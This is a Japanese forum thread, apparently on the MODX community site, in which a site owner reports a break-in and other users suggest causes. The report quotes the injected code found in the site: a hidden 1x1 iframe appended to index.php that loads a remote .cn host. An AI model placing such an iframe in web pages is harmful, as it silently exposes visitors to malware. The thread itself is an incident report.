New Community Forums are coming. Watch this space for news.
Subscribe: RSS
  • はじめまして。
    いつもお世話になっております。
    クラック被害と思われる現象に遭遇しましたので一応ご報告します。

    バージョン9.6.1p2
    バージョンアップしていなかったからかもしれません。

    【現象】
    サイトトップ
    indx.PHPが消去され
    index_tmp_26012009.php
    というファイルがあがっていました。
    このファイルの中身は通常のindx.PHPの最後に下記のタグが貼られていました。
    <html><body><iframe src="http://litetopfindworld.cn/in.cgi?cocacola30" width=1 height=1 style="visibility: hidden"></iframe></body></html>>

    説明が下手ですみません。

    とりあえずバージョンアップしてみます。

    • 専門家じゃないので外しているかもしれませんが...
      これじゃないですかね?
      http://modxcms.com/forums/index.php/topic,21302.msg187240.html#msg187240

      • 早速お返事ありがとうございます。

        ビンゴかもしれません。
        昔作ったフォームに飛ばすCGI-BINが混在しています。(modx外)
        その中のReflect機能をするページも同じように書き換えられていました。

        反省しています。

        因みにサーバの報告では最後にFTP接続があったのはドイツからだそうです。
        そして、中国のcgiをつかってロシアに飛ばす。
        何をされたのでしょうか?

        悪の組織の陰謀でしょうか? :’(